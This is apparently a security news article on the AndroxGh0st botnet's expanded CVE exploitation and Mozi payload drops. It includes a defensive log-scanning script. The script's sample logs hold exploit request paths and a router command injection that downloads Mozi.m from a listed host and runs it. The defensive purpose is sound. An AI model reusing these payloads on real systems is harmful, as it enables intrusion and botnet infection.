AndroxGh0st Expands Reach by Exploiting Security Flaws
A Growing Cyber Threat
The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws in internet-facing applications, and are using the compromised systems to deploy the Mozi botnet malware.
According to a report from CloudSEK, the botnet relies on remote code execution and credential-stealing techniques to maintain persistent access, exploiting unpatched vulnerabilities to work its way into critical infrastructure.
What Is AndroxGh0st?
AndroxGh0st is a Python-based malware tool designed to target Laravel applications. It harvests the secrets those applications keep in their configuration (typically the .env file), such as credentials for AWS, SendGrid, and Twilio.
Since 2022 it has exploited known flaws in Apache HTTP Server (CVE-2021-41773, path traversal leading to remote code execution), Laravel (CVE-2018-15133, deserialization via a leaked APP_KEY), and PHPUnit (CVE-2017-9841, remote code execution through eval-stdin.php) to gain initial access, execute code, and escalate privileges on compromised hosts.
Vulnerabilities Used by AndroxGh0st
CloudSEK's recent analysis shows AndroxGh0st's target list widening considerably. The operators are now exploiting the following flaws to break into systems:
- Cisco ASA WebVPN cross-site scripting – CVE-2014-2120 (CVSS: 4.3)
- Dasan GPON home routers – authentication bypass (CVE-2018-10561) and command injection (CVE-2018-10562) (CVSS: 9.8)
- Atlassian Jira path traversal – CVE-2021-26086 (CVSS: 5.3)
- Metabase local file inclusion – CVE-2021-41277 (CVSS: 7.5)
- Sophos Firewall authentication bypass – CVE-2022-1040 (CVSS: 9.8)
- Oracle E-Business Suite unauthenticated file upload – CVE-2022-21587 (CVSS: 9.8)
- TP-Link Archer AX21 command injection – CVE-2023-1389 (CVSS: 8.8)
- PHP CGI argument injection – CVE-2024-4577 (CVSS: 9.8)
- GeoServer remote code execution – CVE-2024-36401 (CVSS: 9.8)
The botnet also iterates through commonly used administrative usernames with a consistent password pattern against the WordPress login. On a successful login the target redirects to /wp-admin/, the WordPress administration dashboard, which gives the botnet control over the site's critical settings and content.
How AndroxGh0st Uses Routers to Drop the Mozi Payload
The attacks have also been observed abusing unauthenticated command execution on home routers, such as Netgear DGN devices and Dasan GPON models, to drop a payload named "Mozi.m" that is fetched from external servers (200.124.241[.]140 and 117.215.206[.]216).
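A detection pass over web-server access logs for the indicators described above: the Laravel, PHPUnit and Apache flaws AndroxGh0st has abused since 2022, the Jira and Metabase issues from the expanded list, the /wp-login.php credential attack that ends in /wp-admin/, and the router command injections that pull Mozi.m from the two listed hosts. This is an added example, not CloudSEK's analysis or the malware's own code. The log lines are constructed (documentation-range source addresses), the request paths are the publicly documented exploit endpoints for those CVEs, and the signature names and the failed-login threshold are this example's assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Combined log format: client IP, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Request-path signatures for flaws the page names. The endpoints are the
# publicly documented exploit paths; the regexes and names are this example's own.
PATH_SIGNATURES = {
    "laravel_env_probe": re.compile(r"/\.env(\?|$)", re.I),
    "phpunit_eval_stdin CVE-2017-9841": re.compile(
        r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php", re.I),
    "apache_traversal CVE-2021-41773": re.compile(r"/cgi-bin/\.%2e/", re.I),
    "jira_traversal CVE-2021-26086": re.compile(r"/s/[^/]*/_/;/WEB-INF/", re.I),
    "metabase_lfi CVE-2021-41277": re.compile(r"/api/geojson\?url=file:", re.I),
    "dasan_gpon_diag_form": re.compile(r"/GponForm/diag_Form", re.I),
    "netgear_setup_cgi_syscmd": re.compile(r"/setup\.cgi\?.*todo=syscmd", re.I),
}
# Payload hosts the page lists as sources of Mozi.m (defanged in the text).
MOZI_HOSTS = {"200.124.241.140", "117.215.206.216"}
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def parse_line(line):
    """Parse one combined-format line into a dict; None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    # Router command injections arrive URL-encoded in the query string.
    entry["decoded"] = unquote_plus(entry["path"])
    return entry


def classify(entry):
    """Return the indicator names a single request triggers."""
    hits = [name for name, rx in PATH_SIGNATURES.items()
            if rx.search(entry["path"]) or rx.search(entry["decoded"])]
    if "Mozi.m" in entry["decoded"]:
        hosts = set(IPV4_RE.findall(entry["decoded"])) & MOZI_HOSTS
        hits.append("mozi_fetch " + ",".join(sorted(hosts)) if hosts else "mozi_fetch")
    return hits


def analyze(lines, login_threshold=5):
    """Aggregate per-IP exploit indicators and /wp-login.php brute-force suspects.

    WordPress re-renders the login form with HTTP 200 on a failed POST and
    answers a successful one with a 302 to /wp-admin/, so a run of 200s followed
    by a 302 from one source is the pattern the text describes. The usernames
    tried sit in the POST body, not in the access log.
    """
    exploit_hits = defaultdict(set)
    failed, succeeded = Counter(), set()
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        exploit_hits[e["ip"]].update(classify(e))
        if e["method"] == "POST" and e["path"].startswith("/wp-login.php"):
            if e["status"] == "200":
                failed[e["ip"]] += 1
            elif e["status"] == "302":
                succeeded.add(e["ip"])
    brute = {ip: n for ip, n in failed.items() if n >= login_threshold}
    return {
        "exploit_hits": {ip: sorted(h) for ip, h in exploit_hits.items() if h},
        "brute_force": brute,
        "brute_force_then_login": sorted(ip for ip in brute if ip in succeeded),
    }


# Constructed access-log lines (documentation-range source addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Nov/2024:10:00:01 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Nov/2024:10:00:02 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Nov/2024:10:00:03 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 400 226 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Nov/2024:10:01:00 +0000] "GET /s/x/_/;/WEB-INF/web.xml HTTP/1.1" 200 1320 "-" "python-requests/2.31"
198.51.100.7 - - [05/Nov/2024:10:01:01 +0000] "GET /api/geojson?url=file:///etc/passwd HTTP/1.1" 200 2000 "-" "python-requests/2.31"
192.0.2.9 - - [05/Nov/2024:10:02:00 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget+http://200.124.241.140/Mozi.m+-O+/tmp/netgear;sh+/tmp/netgear&curpath=/ HTTP/1.1" 200 0 "-" "Hello, world"
192.0.2.9 - - [05/Nov/2024:10:02:05 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0 "-" "Hello, world"
192.0.2.44 - - [05/Nov/2024:10:05:00 +0000] "GET /wp-admin/ HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""
# Six failed logins from one source, then a success (302), as constructed input.
BRUTE_FORCE = [
    f'203.0.113.5 - - [05/Nov/2024:10:03:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" '
    f'{"302" if i == 6 else "200"} 0 "-" "Mozilla/5.0"'
    for i in range(7)
]


def run_sample():
    """Run the detector over the constructed input and return its report."""
    return analyze(SAMPLE_LOG.splitlines() + BRUTE_FORCE)


if __name__ == "__main__":
    import json
    print(json.dumps(run_sample(), indent=2))
```

The report groups hits per source address, so one scanner that probes .env, eval-stdin.php and the Apache traversal shows up as a single cluster rather than three unrelated events, and the Netgear line is attributed to the listed Mozi host only after URL-decoding the injected command. The GPON request is flagged on its endpoint alone because that exploit carries its command in the POST body, which a plain access log does not record.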
Mozi Botnet’s Role in the Attack
Mozi, another widespread botnet, is known for infecting IoT devices and enlisting them in a network used for DDoS attacks. Although Chinese authorities arrested Mozi's creators in 2021, its activity only came to a halt in August 2023, when an unknown party issued a command that stopped it. That halt is believed to have been triggered by an update that acted as a kill switch.
A Collaboration Between AndroxGh0st and Mozi
AndroxGh0st now embeds Mozi's propagation capabilities into its own operation to extend its reach. Rather than maintaining separate infection routines, it drops Mozi's payloads directly, leveraging Mozi's established ability to infect IoT devices and spread across them.
CloudSEK also notes that if both botnets share the same command-and-control infrastructure, that would point to a high degree of operational integration, and possibly to a single cybercriminal group controlling both AndroxGh0st and Mozi. A combined operation of that kind would give the operators a larger, more coordinated botnet spanning vulnerable IoT devices and web applications alike.